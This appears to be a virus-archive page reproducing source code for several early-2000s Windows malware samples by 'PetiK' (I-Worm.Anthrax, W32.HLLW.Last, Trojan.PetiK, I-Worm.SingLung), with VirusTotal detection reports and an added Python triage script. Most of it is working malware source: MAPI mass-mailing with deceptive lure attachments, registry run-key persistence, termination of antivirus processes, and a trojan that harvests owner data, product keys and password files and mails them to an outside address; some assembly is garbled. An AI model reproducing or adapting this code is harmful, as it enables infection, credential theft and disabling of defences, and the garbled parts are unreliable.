; === gen_mail === subjectwrm db "What is the anthrax ?",0 bodywrm db "I send you some informations about Anthrax.",CRLF db "Click on the attached file.",0 name_mail db "Anthrax_Info.exe",0 mail_from db "support@microsoft.com",0 MsgWrm dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd ? dd dd dd dd dd AttachWrm dd ? dd dd dd dd dd signature author end start end ? ? offset orig_worm offset name_mail ? 1 ? offset mail_addr ? ? ? offset offset ? ? ? 2 offset 1 offset 1 offset subjectwrm bodywrm

MsgFrom MsgToWrm AttachWrm

MsgFrom

? 1 offset MsgFrom offset mail_from ? ?

MsgToWrm

db "I-Worm.Anthrax " db "Coded by PetiK - 2001",00h
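The write-up above lists three host artifacts an incident responder can look for after an Anthrax infection: the "Microsoft System" Run value pointing at MsSys32.exe, the mIRC script.ini whose on-JOIN handler DCC-sends the worm (the s_mirc block in the data section), and the Anthrax_Info.url shortcut written by create_url. The following is an added example, not PetiK's code and not part of the archive: a small offline triage routine that takes a dictionary picture of a host (Run values and file contents) and reports those artifacts. The sample host data is constructed to match the write-up; the function names are mine.

```python
"""Host-artifact triage for the I-Worm.Anthrax indicators listed in the write-up above.

Added example; not PetiK's code and not part of the archive. It works on an
in-memory picture of a host (Run values and file contents passed in as dicts)
so it runs offline; SAMPLE_HOST is constructed to match the write-up.
"""
from __future__ import annotations

import configparser
import re

# Indicators taken from the write-up
RUN_VALUE_NAME = "Microsoft System"
DROPPED_EXE = "mssys32.exe"
SHORTCUT_NAME = "anthrax_info.url"

# mIRC autospread: an "on N:JOIN" handler that DCC-sends a file to every nick that joins.
_ON_JOIN = re.compile(r"^n\d+=\s*on\s+\d+:JOIN:", re.I)
_DCC_SEND = re.compile(r"^n\d+=\s*/?\.?dcc\s+send\s+\$nick\s+(\S.*?)\s*$", re.I)
_BLOCK_END = re.compile(r"^n\d+=\s*}\s*$")


def mirc_autospread_targets(script_ini: str) -> list[str]:
    """Return the files that an on-JOIN handler in script.ini DCC-sends to joining users."""
    in_join, sent = False, []
    for raw in script_ini.splitlines():
        line = raw.strip()
        if _ON_JOIN.match(line):
            in_join = True
        elif in_join and _BLOCK_END.match(line):
            in_join = False
        elif in_join:
            m = _DCC_SEND.match(line)
            if m:
                sent.append(m.group(1))
    return sent


def parse_internet_shortcut(text: str) -> dict[str, str | None]:
    """Parse a .url file (INI syntax with an [InternetShortcut] section) into its fields."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    sec = cp["InternetShortcut"]
    return {"url": sec.get("URL"), "iconfile": sec.get("IconFile"),
            "iconindex": sec.get("IconIndex")}


def triage(run_values: dict[str, str], files: dict[str, str]) -> list[str]:
    """run_values: HKLM\\...\\Run value name -> data; files: path -> content. Returns findings."""
    findings = []
    for name, data in run_values.items():
        if name == RUN_VALUE_NAME or data.lower().endswith(DROPPED_EXE):
            findings.append(f"run-key persistence: {name} = {data}")
    for path, text in files.items():
        low = path.lower()
        if low.endswith("script.ini"):
            for target in mirc_autospread_targets(text):
                findings.append(f"mIRC autospread in {path}: dcc send {target}")
        elif low.endswith(SHORTCUT_NAME):
            findings.append(f"dropped shortcut {path} -> {parse_internet_shortcut(text)['url']}")
    return findings


# Constructed sample data, shaped like what the worm writes (see s_mirc and create_url above)
SAMPLE_SCRIPT_INI = ("[script]\n"
                     "n0=on 1:JOIN:{\n"
                     "n1= /if ( $nick == $me ) { halt }\n"
                     "n2= /.dcc send $nick C:\\WINDOWS\\SYSTEM\\MsSys32.exe\n"
                     "n3=}\n")
SAMPLE_URL = ("[InternetShortcut]\n"
              "URL=http://www.anthrax.com\n"
              "IconIndex=23\n"
              "IconFile=C:\\WINDOWS\\SYSTEM\\Shell32.dll\n")
SAMPLE_HOST = {
    "run_values": {"Microsoft System": r"C:\WINDOWS\SYSTEM\MsSys32.exe",
                   "SystemTray": "SysTray.Exe"},
    "files": {r"C:\mirc\script.ini": SAMPLE_SCRIPT_INI,
              r"C:\WINDOWS\Desktop\Anthrax_Info.url": SAMPLE_URL},
}

if __name__ == "__main__":
    for finding in triage(**SAMPLE_HOST):
        print(finding)
```

The script.ini check is deliberately not tied to the MsSys32.exe name: any on-JOIN handler that DCC-sends a file to `$nick` is the mIRC autospread pattern, whatever the payload is called, so the same check covers other worms of this family.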

VirusTotal report: file Anthrax.exe received on 05.16.2009 10:44:20 (CET)

Engine              Version          Last update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.15
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.15
Avast               4.8.1335.0       2009.05.15
AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.15
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.15
F-Secure            8.0.14470.0      2009.05.15
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.735         2009.05.14
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.15
PCTools             4.4.2.0          2009.05.15
Prevx               3.0              2009.05.16
Rising              21.29.51.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.15

Detection names reported (38 of the 40 engines flagged the file): Email-Worm.Win32.Petik!IK; Win32/PetTick.worm.6144; Worm/Petik.1; Worm/Win32.Win32; W32/Malware!156f; Win32:AntraxInfo; I-Worm/Petik; Generic.Malware.SIg.638D8F0A; Worm.Petik.1; Worm.Win32.Petik.T; Win32.Petik.8192; Suspicious File; Win32/Petik.6144.B; W32/Malware!156f; Email-Worm.Win32.Petik; W32/PetTick@mm; Generic.Malware.SIg.638D8F0A; Email-Worm.Win32.Petik; Email-Worm.Win32.Petik; Email-Worm.Win32.Petik; W32/PetTick@MM; Artemis!0C6CD035D3C5; Worm.Petik.1; Worm:Win32/PetTick@mm; Win32/Petik.T; W32/Pet_Tick.6144.B; Worm/W32.Petik.6144.B; W32/Petik; I-Worm.Petik.L; High Risk Cloaked Malware; Worm.Anthrax; W32/Petick-A; Worm.Petik; W95.Pet_Tick.gen; WORM_PET.TICK.S; Win32.Worm.Anthrax; I-Worm.Win32.PetTick.6144; I-Worm.Petik.L

Additional information
File size: 6144 bytes
MD5:    0c6cd035d3c5b84b13d1f54d70bf5fb3
SHA1:   80bd3e0ec9c6ab27997d7e55d4b0094ebeea26c9
SHA256: 36ee4e185c6b791ae8d38118bd0e00ae3c2135c1bfcd7f3452165a18c96283dc
PEiD:   UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

/*
Name    : W32.HLLW.Last
Author  : PetiK
Size    : 28672 bytes
Date    : 10/12/2001
Comment : My very first (and last) worm coded in C++ (compiled with Borland).
          Why this name? I decided to stop coding worms and viruses. During one year
          I learnt many things about worms and viruses and I thank all the people who helped me.
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argsused // do not generate a compilation listing file

char filename[100];
char windir[100], windr[100];
HKEY hReg;
FILE *htm;
HANDLE infhtm,lSnapshot,myproc;
HWND NAVh;
BOOL rProcessFound;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
LHANDLE session;
MapiMessage *mess;
HINSTANCE hMAPI;
char messId[512],mname[50],maddr[30];
unsigned long count=0;
BYTE done[50];
DWORD siz=sizeof(done);
DWORD type=REG_SZ;
LPSTR Persona=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
SYSTEMTIME syst;
PROCESSENTRY32 uProcess;
WIN32_FIND_DATA ffile;

char *sujet[]={
  "New Game for You.",
  "Protect your computer against VBS/Worm and VBS/Virus",
  "Free Flash Application !",
  "Internet Explorer 5.0/6.0 Patch",
  "Try WinXP.",
  "Free Chat",
};
char *corps[]={
  "Hi,\n\nTake a look at this new game found on the web.",
  "This tool allows you to protect your computer against the VBS worm/virus.",
  "Hi,\n\nVery good application make with Flash 5.",
  "There is the last patch for Internet Explorer against the ActiveX's bugs.",
  "Run this small program to see a demo of Win XP.",
  "Hello,\n\nVery cool program to chat on the net.",
};
char *attachfile[]={
  "New_Game.exe",
  "Fix_VBSWormVirus.exe",
  "Flash_EXE.exe",
  "IEPatch.exe",
  "Demo_WinXP.exe",
  "FreeChat.exe",
};
char *text[]={
  "This file is not a Win32 file valid",
  "Cannot Open files : It does not appear to be a valid Win32\n\nIf you downloaded the file, try downloading again.",
  "Error with Kernel32 :\nThis program will be terminated.",
  "Loader Error :\nThis program will be terminated."
};

void Welcome();
void FuckAntivirus();
void htmfile();
void Spread();
ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { HMODULE k32=GetModuleHandle("KERNEL32.DLL"); if(k32) { (FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess"); if(RegSerPro) RegSerPro(NULL,1); } GetModuleFileName(hInst,filename,100); GetWindowsDirectory((char *)windir,100); strcpy(windr,windir); strcat(windir,"\\MSKERN32.EXE"); if ((lstrcmp(filename,windir))!=0) { Welcome(); } strcat(windr,"\\MSKern32.exe"); CopyFile(filename,windr,0); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"MS Kernel32",0,REG_SZ, (BYTE *)windr, 100); RegCloseKey(hReg); FuckAntivirus(); GetSystemTime(&syst); if(syst.wDay==1 && syst.wMonth==12) { CreateDirectory("C:\\PetiK_Dir",0); SetCurrentDirectory("C:\\PetiK_Dir"); htm = fopen("petikvx.htm","w"); fprintf(htm,"<html><head><title>The Last From PetiK</title></head>\n"); fprintf(htm,"<body bgcolor=\"blue\" text=\"yellow\">\n"); fprintf(htm,"<p align=\"center\"><font size=\"5\">Win32.HLLW.Last is in your computer\n"); fprintf(htm,"<p align=\"center\"><font size=\"5\">This my last worm\n"); fprintf(htm,"<p align=\"center\"><font size=\"3\">Greetz to : all3gro, Benny, Bumblebee, "); fprintf(htm,"Mandragore, ZeMacroKiller98, the 29A group and the [MATRiX] group.\n"); fprintf(htm,"<p align=\"center\"><font size=\"5\">GOOD BYE\n"); fprintf(htm,"</font></p>\n"); fprintf(htm,"</body></html>"); fclose(htm); ShellExecute(0,"open","petikvx.htm",0,0,SW_SHOWNORMAL); Sleep(3000); MessageBox(NULL,"My last worm.\nCoded by PetiK (c)2001","W32.HLLW.Last", MB_OK| MB_ICONINFORMATION); } htmfile(); Sleep(30000); Spread(); return 0; } void Welcome()

{ MessageBeep(MB_ICONHAND); MessageBox(NULL, text[GetTickCount()&3], filename, MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); } void FuckAntivirus() { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); } void htmfile() { register bool abc=TRUE; register HANDLE hFile; register HWND verif; RegOpenKeyEx(HKEY_USERS,Persona,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Personal",0,&type,done,&siz); RegCloseKey(hReg); SetCurrentDirectory(done); hFile=FindFirstFile("*.ht*",&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { WritePrivateProfileString("HTM,HTML Files",ffile.cFileName,"Found by W32.HLLW.Last","C:\\liste.txt"); abc=FindNextFile(hFile,&ffile); } } FindClose(hFile); abc=TRUE; hFile=FindFirstFile("*.doc",&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { WritePrivateProfileString("DOC Files",ffile.cFileName,"Found by W32.HLLW.Last","C:\\liste.txt"); abc=FindNextFile(hFile,&ffile); } } SetFileAttributes("C:\\liste.txt",FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN); } void Spread() { hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); (FARPROC 
&)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) { count=(unsigned long)(syst.wMilliseconds*syst.wMinute); while(count>5)

count=(unsigned long)(count/2); strcpy(mname,mess->lpOriginator->lpszName); strcpy(maddr,mess->lpOriginator->lpszAddress); mess->ulReserved=0; mess->lpszSubject=sujet[count]; mess->lpszNoteText=corps[count]; mess->lpszMessageType=NULL; mess->lpszDateReceived=NULL; mess->lpszConversationID=NULL; mess->flFlags=MAPI_SENT; mess->lpOriginator->ulReserved=0; mess->lpOriginator->ulRecipClass=MAPI_ORIG; mess->lpOriginator->lpszName=mess->lpRecips->lpszName; mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress; mess->nRecipCount=1; mess->lpRecips->ulReserved=0; mess->lpRecips->ulRecipClass=MAPI_TO; mess->lpRecips->lpszName=mname; mess->lpRecips->lpszAddress=maddr; mess->nFileCount=1; mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mess->lpFiles, 0, sizeof(MapiFileDesc)); mess->lpFiles->ulReserved=0; mess->lpFiles->flFlags=NULL; mess->lpFiles->nPosition=-1; mess->lpFiles->lpszPathName=filename; mess->lpFiles->lpszFileName=attachfile[count]; mess->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mess, NULL, NULL); count++; } }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mess->lpFiles); mFreeBuffer(mess); mLogoff(session,0,0,0); FreeLibrary(hMAPI); } }

VirusTotal report: file Last.exe received on 05.16.2009 17:43:12 (CET)

Engine              Version          Last update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.16
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.16
Avast               4.8.1335.0       2009.05.15
AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.16
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.16
F-Secure            8.0.14470.0      2009.05.15
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.737         2009.05.16
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.16
PCTools             4.4.2.0          2009.05.16
Prevx               3.0              2009.05.16
Rising              21.29.52.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.16

Detection names reported (38 of the 40 engines flagged the file): Email-Worm.Win32.Stopin!IK; Win32/Stopin.worm.28672; Worm/Stopin.B; Worm/Win32.Stopin; Win32:Matrix-GoodY; I-Worm/Petik.T; I-Worm.Stopin.B; I-Worm.Stopin.b; Worm.Stopin.B; Worm.Win32.Stopin.A; Win32.HLLM.Petik.59932; Win32.Stopin.b; Win32/Petik.28672.A; Email-Worm.Win32.Stopin.b; W32/Stopin.B@mm; I-Worm.Stopin.B; Email-Worm.Win32.Stopin; Email-Worm.Win32.Stopin.b; Email-Worm.Win32.Stopin.b; W32/Stopin.a@MM; W32/Stopin.a@MM; Worm.Stopin.B; Worm:Win32/Petick.AI@mm; Win32/Stopin.A; W32/Stopin.B@mm; Worm/W32.Stopin.28672; W32/HLLW.Last; I-Worm.Petlast.A; High Risk Worm; Worm.Mail.Stopin.a; W32/Stall-A; Email-Worm.Win32.Stopin.b; W95.Pet_Tick.gen; W32/Stopin.b; WORM_PETTICK.Z; Win32.HLLW.Last; I-Worm.Win32.Stopin.B; I-Worm.Petlast.A

Additional information
File size: 28672 bytes
MD5:  bfce6a179fa853c4c0a5bffc6b8c8f72
SHA1: 6c8f1623c5471d556003928c15bf670175fc4d3d
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

/*
Name     : Trojan.PetiK
Author   : PetiK
Language : C++/ASM
Started  : 12 December 2001
Finished : 29 December 2001
Modified : 13 January 2002
*/

#include <windows.h>
#include <tlhelp32.h>
#include <mapi.h>
#pragma argused
#pragma inline

// Install the trojan
char filename[100], sysdir[100], sysdr[100], liste[50], pwl[50];
HKEY hReg;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

// Fuck antivirus
HANDLE lSnapshot,myproc;
BOOL rProcessFound;

// Collect information
BYTE owner[100],org[100],key[30],id[30],ver[30];
BYTE page[150];
DWORD sizowner=sizeof(owner),sizorg=sizeof(org),sizkey=sizeof(key),sizid=sizeof(id);
DWORD sizver=sizeof(ver),sizpage=sizeof(page),type=REG_SZ;
LPSTR CurVer="Software\\Microsoft\\Windows\\CurrentVersion",Main="Software\\Microsoft\\Internet Explorer\\Main";

// Send the information
PROCESSENTRY32 uProcess;
WIN32_FIND_DATA Search;

void Bienvenue();
void StopDetect();
void Information();
void SendInfo();

ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG); int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { HMODULE k32=GetModuleHandle("KERNEL32.DLL"); if(k32) { (FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess"); if(RegSerPro) RegSerPro(NULL,1); } // Install trojan GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); strcpy(sysdr,sysdir); strcat(sysdir,"\\SETUP02.EXE"); if ((lstrcmp(filename,sysdir))!=0) { Bienvenue(); } else { SendInfo(); } strcat(sysdr,"\\Setup02.exe"); CopyFile(filename,sysdr,0); RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg); RegSetValueEx(hReg,"Microsoft Setup",0,REG_SZ, (BYTE *)sysdr, 100); RegCloseKey(hReg); StopDetect();

Information(); } void StopDetect() { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); } void Information() { register bool abc=TRUE; register HANDLE hFile; GetSystemDirectory((char *)liste,50); strcat(liste,"\\liste_troj.txt"); RegOpenKeyEx(HKEY_LOCAL_MACHINE,CurVer,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"RegisteredOwner",0,&type,owner,&sizowner); RegQueryValueEx(hReg,"RegisteredOrganization",0,&type,org,&sizorg); RegQueryValueEx(hReg,"ProductKey",0,&type,key,&sizkey); RegQueryValueEx(hReg,"ProductId",0,&type,id,&sizid); RegQueryValueEx(hReg,"Version",0,&type,ver,&sizver); RegCloseKey(hReg); RegOpenKeyEx(HKEY_CURRENT_USER,Main,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Start Page",0,&type,page,&sizpage); RegCloseKey(hReg); WritePrivateProfileString("Info Ordi","Owner",owner,liste); WritePrivateProfileString("Info Ordi","Organization",org,liste); WritePrivateProfileString("Info Ordi","ProductKey",key,liste); WritePrivateProfileString("Info Ordi","ProductId",id,liste); WritePrivateProfileString("Info Ordi","Version",ver,liste); WritePrivateProfileString("Info Internet","Page Internet",page,liste); GetWindowsDirectory((char *)pwl,50); SetCurrentDirectory(pwl); hFile=FindFirstFile("*.pwl",&Search); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { WritePrivateProfileString("Info Pass",Search.cFileName,pwl,liste); 
abc=FindNextFile(hFile,&Search); } } FindClose(hFile); } void SendInfo() { _asm { DebutAsm: push 50 push offset liste call GetSystemDirectoryA call @liste db "\liste_troj.txt",0 @liste: push offset liste call lstrcat

call @wininetdll db "WININET.DLL",0 @wininetdll: call LoadLibrary test eax,eax jz send mov ebp,eax call @inetconnect db "InternetGetConnectedState",0 @inetconnect: push ebp call GetProcAddress test eax,eax jz End mov edi,eax verif: push 00h push offset Tmp call edi dec eax jnz verif push ebp call FreeLibrary send: call @mapidll db "MAPI32.DLL",0 @mapidll: call LoadLibrary test eax,eax jz End mov ebp,eax call @sendmail db "MAPISendMail",0 @sendmail: push ebp call GetProcAddress test eax,eax jz End mov edi,eax xor push push push push push call push call push call End: jmp eax,eax eax eax offset Message eax [MsgHdl] edi 5000 Sleep ebp FreeLibrary FinAsm db 50 dup (0) dd 0 dd 0 db "Pentasm99@aol.com",0 db "Trojan_PetiK, OUVRE-VITE PETIK",0 db "Encors un con ki s'est fait prendre",0dh,0ah db "Tant pis pour lui. Je peux tout voir.",0dh,0ah,0dh,0ah,0dh,0ah db 9,9,"PetiKVX (www.petikvx.fr.fm)",0 dd dd dd dd dd dd dd dd dd dd dd dd ? offset offset ? ? ? 2 offset 1 offset 1 offset

liste Tmp MsgHdl petikmail subject body

Message

subject body

MsgFrom MsgTo Attach

MsgFrom

dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

? ? ? ? ? ? ? 1 offset petikmail offset petikmail ? ? ? ? ? offset liste ? ?

MsgTo

Attach

FinAsm: } RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg); RegDeleteValue(hReg,"Microsoft Setup"); RegCloseKey(hReg); } void Bienvenue() { MessageBox(NULL,"Je te souhaite une Bonne et Heureuse Nouvelle Année.\nEt tous mes meilleurs voeux.", "BONNE ANNEE !",MB_OK|MB_ICONINFORMATION); }

VirusTotal report: file Trojan_PetiK.exe received on 05.16.2009 20:10:19 (CET)

Engine              Version          Last update
a-squared           4.0.0.101        2009.05.16
AhnLab-V3           5.0.0.2          2009.05.16
AntiVir             7.9.0.168        2009.05.15
Antiy-AVL           2.0.3.1          2009.05.15
Authentium          5.1.2.4          2009.05.16
Avast               4.8.1335.0       2009.05.15
AVG                 8.5.0.336        2009.05.15
BitDefender         7.2              2009.05.16
CAT-QuickHeal       10.00            2009.05.15
ClamAV              0.94.1           2009.05.16
Comodo              1157             2009.05.08
DrWeb               5.0.0.12182      2009.05.16
eSafe               7.0.17.0         2009.05.14
eTrust-Vet          31.6.6508        2009.05.16
F-Prot              4.4.4.56         2009.05.16
F-Secure            8.0.14470.0      2009.05.16
Fortinet            3.117.0.0        2009.05.16
GData               19               2009.05.16
Ikarus              T3.1.1.49.0      2009.05.16
K7AntiVirus         7.10.737         2009.05.16
Kaspersky           7.0.0.125        2009.05.16
McAfee              5616             2009.05.15
McAfee+Artemis      5616             2009.05.15
McAfee-GW-Edition   6.7.6            2009.05.15
Microsoft           1.4602           2009.05.16
NOD32               4080             2009.05.15
Norman              6.01.05          2009.05.16
nProtect            2009.1.8.0       2009.05.16
Panda               10.0.0.14        2009.05.16
PCTools             4.4.2.0          2009.05.16
Prevx               3.0              2009.05.16
Rising              21.29.52.00      2009.05.16
Sophos              4.41.0           2009.05.16
Sunbelt             3.2.1858.2       2009.05.16
Symantec            1.4.4.12         2009.05.16
TheHacker           6.3.4.1.326      2009.05.15
TrendMicro          8.950.0.1092     2009.05.15
VBA32               3.12.10.5        2009.05.16
ViRobot             2009.5.15.1737   2009.05.15
VirusBuster         4.6.5.0          2009.05.16

Detection names reported (17 of the 40 engines flagged the file; the rest reported nothing): PSW.Generic.HIF; Trojan.PWS.Petilam.A; Trojan.PWS.Petilam; Suspicious File; Trojan-PSW.Win32.Petilam; Trojan.PWS.Petilam.A; Trojan-PSW.Win32.Petilam; PWS:Win32/Petilam; probably unknown NewHeur_PE; Suspicious file; Trojan.PWS.Petilam.A; Medium Risk Malware; Trojan.Spy.Win32.Undef.GEN [Suspicious]; BehavesLike.Win32.Malware (v); TROJ_PETILAM.A; Win32.PSW.Petilam; Trojan.PWS.Petilam.A

Additional information
File size: 24064 bytes
MD5:  c12a8711efbf38f0820c827f22269684
SHA1: 2afd3a9fb4ae7af97c9618b98b87b28894fec2d2
PEiD: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

/*
Name     : I-Worm.SingLung
Author   : PetiK
Date     : January 23rd 2002
Language : C++/Win32asm

Terminates some processes (antivirus tools).
Copies itself to %SYSDIR%\MSGDI32.EXE.
Waits for an Internet connection.
Scans some HTML files to find e-mail addresses and spreads with the MAPI functions.

Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline

char filename[100],sysdir[100],sysdr[100],winhtm[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
      SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
int i;
HANDLE fd,lSnapshot,myproc;
BOOL rProcessFound;
FILE *vbs;
BYTE desktop[50],favoris[50],personal[50],cache[50];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
      sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
DWORD type=REG_SZ;
FILE *stopv;
LHANDLE session;
MapiMessage mess;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
PROCESSENTRY32 uProcess;
SYSTEMTIME systime;
WIN32_FIND_DATA ffile;
HDC dc;

void Welcome();
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
void FeedBack();

//ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
/* // Worm in RegisterServiceProcess
HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
if(kern32)
{
  (FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
  if(RegSerPro) RegSerPro(NULL,1);
}
*/
// Fuck some AntiVirus hahahaha
StopAV("AVP32.EXE");     // AVP
